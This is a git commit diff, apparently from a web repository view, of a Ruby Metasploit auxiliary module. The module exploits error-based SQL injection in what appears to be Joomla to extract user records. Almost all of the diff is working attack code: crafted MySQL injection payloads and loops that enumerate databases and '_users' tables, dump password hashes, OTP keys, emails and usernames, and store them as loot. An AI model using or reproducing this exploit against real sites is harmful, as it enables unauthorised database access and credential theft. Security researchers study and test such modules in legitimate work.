parent
e4281dd1fb
commit
07d549d783
|
@ -58,69 +58,64 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
left_marker = Rex::Text.rand_text_alpha(5)
|
left_marker = Rex::Text.rand_text_alpha(5)
|
||||||
right_marker = Rex::Text.rand_text_alpha(5)
|
right_marker = Rex::Text.rand_text_alpha(5)
|
||||||
|
|
||||||
if datastore['ACTION'] == 'HASHES'
|
db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
||||||
db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
res = sqli(db_count)
|
||||||
res = sqli(db_count)
|
db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
||||||
db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
|
||||||
|
|
||||||
dbs = []
|
dbs = []
|
||||||
0.upto(db_count-1) do |i|
|
0.upto(db_count-1) do |i|
|
||||||
db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
||||||
|
res = sqli(db)
|
||||||
res = sqli(db)
|
dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
||||||
dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
|
||||||
end
|
|
||||||
|
|
||||||
dbs.delete('performance_schema')
|
|
||||||
dbs.delete('information_schema')
|
|
||||||
dbs.delete('mysql')
|
|
||||||
|
|
||||||
users = []
|
|
||||||
dbs.each do |db|
|
|
||||||
|
|
||||||
tables = []
|
|
||||||
table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
|
||||||
res = sqli(table_count)
|
|
||||||
table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
|
||||||
|
|
||||||
0.upto(table_count-1) do |i|
|
|
||||||
table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
|
||||||
res = sqli(table)
|
|
||||||
table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
|
||||||
tables << table if table =~ /_users$/
|
|
||||||
end
|
|
||||||
|
|
||||||
tables.each do |table|
|
|
||||||
|
|
||||||
user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
|
||||||
res = sqli(user_count)
|
|
||||||
user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
|
||||||
cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
|
|
||||||
|
|
||||||
0.upto(user_count-1) do |i|
|
|
||||||
user = {}
|
|
||||||
cols.each do |col|
|
|
||||||
k = 1
|
|
||||||
val = nil
|
|
||||||
user[col] = ''
|
|
||||||
while val != ''
|
|
||||||
get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
|
||||||
res = sqli(get_col)
|
|
||||||
val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
|
||||||
user[col] << val
|
|
||||||
k = k + 54
|
|
||||||
end
|
|
||||||
end
|
|
||||||
users << user
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
p users.to_json
|
|
||||||
elsif datastore['ACTION'] == 'SESSIONS'
|
|
||||||
|
|
||||||
else
|
|
||||||
fail_with(Failure::Unknown, "The ACTION " + datastore['ACTION'] + " is not supported.")
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
dbs.delete('performance_schema')
|
||||||
|
dbs.delete('information_schema')
|
||||||
|
dbs.delete('mysql')
|
||||||
|
|
||||||
|
users = []
|
||||||
|
dbs.each do |db|
|
||||||
|
vprint_status("Found database: " + db)
|
||||||
|
tables = []
|
||||||
|
table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
||||||
|
res = sqli(table_count)
|
||||||
|
table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
||||||
|
|
||||||
|
0.upto(table_count-1) do |i|
|
||||||
|
table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
||||||
|
res = sqli(table)
|
||||||
|
table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
||||||
|
tables << table if table =~ /_users$/
|
||||||
|
end
|
||||||
|
|
||||||
|
tables.each do |table|
|
||||||
|
vprint_status("Found table: " + table)
|
||||||
|
user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
||||||
|
res = sqli(user_count)
|
||||||
|
user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
||||||
|
cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
|
||||||
|
|
||||||
|
0.upto(user_count-1) do |i|
|
||||||
|
user = {}
|
||||||
|
cols.each do |col|
|
||||||
|
k = 1
|
||||||
|
val = nil
|
||||||
|
user[col] = ''
|
||||||
|
while val != ''
|
||||||
|
get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
|
||||||
|
res = sqli(get_col)
|
||||||
|
val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
||||||
|
user[col] << val
|
||||||
|
k = k + 54
|
||||||
|
end
|
||||||
|
end
|
||||||
|
users << user
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
path = store_loot('joomla.file', 'text/plain', datastore['RHOST'], users.to_json, 'joomla.users')
|
||||||
|
print_good("Users saved to file: " + path)
|
||||||
end
|
end
|
||||||
|
|
||||||
def sqli(payload)
|
def sqli(payload)
|
||||||
|
|
Loading…
Reference in New Issue